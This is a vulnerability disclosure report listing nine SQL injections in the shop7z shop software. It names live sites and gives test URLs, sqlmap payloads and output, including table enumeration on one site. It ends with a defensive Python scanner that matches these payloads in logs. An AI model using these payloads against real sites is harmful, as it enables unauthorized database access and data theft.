### Brief description:

Nine SQL injections in shop7z, bundled into one report. I have submitted several times already; it is tiring, but when I think of the reviewers who have to go through so many holes, my own tiredness really is nothing.

### Detailed description:

Cases: http://www.gzsewing.com http://www.125309.com http://www.nm3g.org http://35dianqi.com http://www.ai04.com http://www.longmm.net http://www.99pwan.com http://www.heimawg.com http://www.hzjdpm.cn http://ptwb.net http://5lmm.cn

#1 Vulnerable file: /admin/dingdan_sendnot.asp
Affected parameter: id (via POST)
TEST: http://www.125309.com/admin/dingdan_sendnot.asp

```
id=1
```

```
Place: POST
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original value)
    Payload: id=IIF(2159=2159,1,1/0)
---
[19:37:57] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:37:57] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[19:37:57] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[19:37:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:37:57] [INFO] retrieved:
[19:37:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:37:58] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[19:37:58] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
[19:38:01] [INFO] checking table existence using items from 'D:\python\sqlmap\txt\common-tables.txt'
[19:38:01] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 9
[19:38:01] [INFO] starting 9 threads
[19:38:06] [INFO] retrieved: admin
[19:38:23] [INFO] retrieved: article
[19:40:37] [INFO] retrieved: ad
[19:41:05] [INFO] retrieved: message
Database: Microsoft_Access_masterdb
[4 tables]
+---------+
| ad      |
| admin   |
| article |
| message |
+---------+
```

#2 Vulnerable file: /admin/lipindel.asp (reachable without authorization)
Affected parameter: id
TEST: http://www.125309.com/admin/lipindel.asp?id=1

```
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original value)
    Payload: id=IIF(1449=1449,1,1/0)
---
[19:46:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:46:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'

[*] shutting down at 19:46:56
```

#3 Vulnerable file: /show.asp?tk=shop7z
Affected parameter: pkid (via POST)
TEST: http://www.125309.com/show.asp?tk=shop7z

```
pkid=1
```

```
Place: POST
Parameter: pkid
    Type: UNION query
    Title: Generic UNION query (NULL) - 38 columns
    Payload: pkid=-2466 UNION ALL SELECT CHR(58)&CHR(120)&CHR(108)&CHR(112)&CHR(58)&CHR(111)&CHR(71)&CHR(69)&CHR(101)&CHR(89)&CHR(81)&CHR(101)&CHR(74)&CHR(104)&CHR(110)&CHR(58)&CHR(99)&CHR(106)&CHR(99)&CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:48:36] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:48:36] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'

[*] shutting down at 19:48:36
```

#4 Vulnerable file: orderpro_del.asp
Affected parameter: id
TEST: http://www.125309.com/orderpro_del.asp?id=1

```
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original value)
    Payload: id=IIF(2623=2623,1,1/0)
---
[19:50:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[19:50:23] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'

[*] shutting down at 19:50:23
```

#5 Vulnerable file: show_foot.asp
Affected parameter: c_id
TEST: http://www.125309.com/show_foot.asp?c_id=1

```
Place: GET
Parameter: c_id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original value)
    Payload: c_id=IIF(3932=3932,1,1/0)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: c_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(104)&CHR(115)&CHR(121)&CHR(58)&CHR(115)&CHR(90)&CHR(101)&CHR(90)&CHR(89)&CHR(79)&CHR(67)&CHR(102)&CHR(120)&CHR(119)&CHR(58)&CHR(102)&CHR(113)&CHR(107)&CHR(58),NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:51:54] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:51:55] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'

[*] shutting down at 19:51:55
```

#6 Vulnerable file: showone.asp
Affected parameter: l_id
TEST: http://www.125309.com/showone.asp?l_id=1

```
Place: GET
Parameter: l_id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original value)
    Payload: l_id=IIF(9827=9827,1,1/0)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: l_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(122)&CHR(102)&CHR(104)&CHR(58)&CHR(113)&CHR(87)&CHR(69)&CHR(120)&CHR(108)&CHR(79)&CHR(88)&CHR(86)&CHR(109)&CHR(116)&CHR(58)&CHR(106)&CHR(116)&CHR(122)&CHR(58),NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:53:38] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:53:38] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'

[*] shutting down at 19:53:38
```

#7 Vulnerable file: /admin/dingdan_detail.asp (reachable without authorization)
Affected parameter: id
TEST: http://www.125309.com/admin/dingdan_detail.asp?id=1

```
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9606=9606
---
[19:54:50] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:54:50] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'

[*] shutting down at 19:54:50
```

### Proof of vulnerability:

#8 Vulnerable file: /admin/chongzhimodify.asp (reachable without authorization)
Affected parameter: id (via POST)
TEST: http://www.125309.com/admin/chongzhimodify.asp

```
id=1
```

```
Place: POST
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original value)
    Payload: id=IIF(3785=3785,1,1/0)
---
[19:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:58:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 85 times
[19:58:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'

[*] shutting down at 19:58:56
```

There is one more I am not certain about, but it should be injection as well.

#9 Vulnerable file: /admin/zhfbili.asp (reachable without authorization)
Affected parameter: zhfbili (via POST)
TEST: http://www.125309.com/admin/zhfbili.asp

```
zhfbili=1'&Submit=+%B1%A3%B4%E6+&ok=1
```

```
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 ''1''' 中。
/admin/zhfbili.asp,行 77
```
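As an added defender-side example (not part of the original report), the following Python scans IIS-style log lines for the request patterns quoted in the findings above: the Access `IIF()` boolean payloads, `UNION ALL SELECT` with `CHR()` concatenation against `MSysAccessObjects`, the `AND n=n` tautology, and non-integer values in the id-type parameters. The W3C log field layout, the parameter list and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Parameters the report shows are expected to be integer ids (assumed list, taken from the findings).
NUMERIC_PARAMS = {"id", "pkid", "c_id", "l_id", "zhfbili"}

# Signatures derived from the sqlmap payloads quoted in the report.
SIGNATURES = {
    "access-iif-blind": re.compile(r"\bIIF\s*\(", re.I),
    "union-select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "access-system-table": re.compile(r"\bMSys\w+", re.I),
    "chr-concat": re.compile(r"CHR\s*\(\s*\d+\s*\)\s*&\s*CHR", re.I),
    "tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
}

# Constructed W3C-style lines: date time method uri-stem uri-query status ("-" = no query).
SAMPLE_LOG = """\
2014-03-01 19:46:56 GET /admin/lipindel.asp id=IIF(1449%3D1449,1,1/0) 200
2014-03-01 19:51:54 GET /show_foot.asp c_id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CHR(58)%26CHR(104)%26CHR(58),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20MSysAccessObjects%00 200
2014-03-01 19:54:50 GET /admin/dingdan_detail.asp id=1%20AND%209606%3D9606 200
2014-03-01 19:58:56 POST /admin/chongzhimodify.asp - 500
2014-03-01 20:00:00 GET /showone.asp l_id=42 200
"""

LOG_RE = re.compile(r"^(?P<date>\S+) (?P<time>\S+) (?P<method>\S+) (?P<path>\S+) (?P<query>\S+) (?P<status>\d{3})$")


def classify_query(query: str) -> list[str]:
    """Names of the signatures matching the URL-decoded query, plus
    'non-numeric-id' when an id-type parameter is not a plain integer."""
    decoded = unquote_plus(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    # parse_qsl splits on the raw '&' so an encoded '%26' inside a value stays in that value.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value.strip()):
            hits.append("non-numeric-id")
            break
    return hits


def scan_log(text: str) -> list[dict]:
    """Return one finding per suspicious line: time, path and the signature names hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        hits = classify_query("" if rec["query"] == "-" else rec["query"])
        # POST bodies are not in IIS logs; a burst of 500s on an admin script (85 seen in #8) is a weak signal.
        if rec["method"] == "POST" and rec["status"] == "500" and rec["path"].startswith("/admin/"):
            hits.append("admin-post-500")
        if hits:
            findings.append({"time": rec["time"], "path": rec["path"], "hits": hits})
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the first four constructed lines and leaves the plain `l_id=42` request alone.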